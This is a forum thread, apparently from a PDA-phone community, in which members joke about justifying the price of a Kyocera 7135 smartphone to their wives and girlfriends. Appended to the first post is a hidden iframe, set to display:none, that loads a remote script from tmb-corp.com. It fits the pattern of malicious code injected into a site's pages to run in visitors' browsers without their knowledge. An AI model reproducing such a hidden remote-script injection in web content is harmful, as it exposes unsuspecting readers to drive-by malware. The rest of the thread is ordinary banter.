+ Reply to Thread

How to justify buying a 7135

So how does one justify spending so much money for a cell phone? I've been struggling with this ever since it became available from getconnected.com. Being able to afford it and justifying it to yourself (and spouse!) are two totally different things. After much lamenting, I think I've found the perfect answer (for me anyway). I'm going to raise the money by selling some stuff on EBay. I'm a bit of a pack-rat, so my basement is full of semi-usefull stuff. I'm sure most of you have stuff packed away that you will never use again. The best part came when I ran this idea by my wife. She said "If it gets some of that crap out of the basement, I'm all for it. Buy whatever you want." So now I just need to find $700 worth of stuff to pedal. If any of you would like to contribute to my 7135 fund, here is my first listing.
    http://cgi.ebay.com/ws/eBayISAPI.dll...157231259&rd=1

I think this will alow me to buy the phone, feel good about it, and not take any flack from the wife!!

Maybe we should have a prize for the weirdest thing sold to raise money for a 7135.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: How to justify buying a 7135

Originally posted by greglivernois

I think this will alow me to buy the phone, feel good about it, and not take any flack from the wife!!
    Face it, she's probably gonna give you flack anyway... Most (but not all) ladies appreciate technology about as much as we appreciate flowers!:argue

But at least you'll always get the LAST 2 words: "Yes, dear!")
    Mark

Re: Re: How to justify buying a 7135

Get her one. She may like it and then you'd have another thing in common. If she doesn't, she'll let you keep it for yourself.

(I LOVE MY 7135!)

But that means I need to come up with $1400. I guess I'll head downstairs to see what else I can find to sell!

Get lots of apps that she can use. Worked for me.

I gave my GF my Color IIIc so she is still happy and we can share Color Apps between us! (Im stuck with an old IIIxe until i get my 7135)
    iPhone therefore iAm.

Steve, you are a good BF. You are "suffering" w/o color while your GF is hooked up. Don't think she will be satisfied once when she sees your 7135 though.

Originally posted by greglivernois
    But that means I need to come up with $1400. I guess I'll head downstairs to see what else I can find to sell!
    Dude! If you are going to buy her one too, then don't just look downstairs... look upstairs also (her stuff! ) j/k!
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Beryl
    Steve, you are a good BF. You are "suffering" w/o color while your GF is hooked up. Don't think she will be satisfied once when she sees your 7135 though.
    she said she's not going to be jealous of it, but she wants to play with it to set all the highscores on my games before I do!

She doesn't have a phone, but wants one so I am trying to figure out a way that I can use that to my advantage. If VZ offers a Special price for new subscribers, then I'm going to complain and See if they will give me that price to add it for her as a second line! (at the same time applying my $100 NE2 discount as well. )Then if im ambitious I could try to get another $100 bucks out of them because I will update my plan for another 2 years. Of couse I will then switch my phone number over to the 7135 and probably get a new phone for her instead of giving her my old one as the second line.
    iPhone therefore iAm.

Originally posted by Steve
    she said she's not going to be jealous of it ...
    Like I said, you are a good BF -- so trusting. Be prepared to fork over another $700.

Originally posted by Beryl
    Like I said, you are a good BF -- so trusting. Be prepared to fork over another $700.
    LOL I know, I know..... She used to own my old Palm III and that "migrated" to her Sister when I gave her my IIIc... I know she will someday want my 7135 when/if Kyocera ever makes a 8000 series that knocks the 7135 out of the ballpark. At least they are going to a good home
    iPhone therefore iAm.

Just Buy it and tell her you won it on smartphonecource.com
    No Honey it didn't cost that much really it didn't

Oooooooo, good one!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Mwynn
    Just Buy it and tell her you won it on smartphonecource.com
    Obviously our friend Mwynn is single because telling that kind of lie to your wife will surely come back to bite you in the butt when she finds out the truth due to some freak accident!!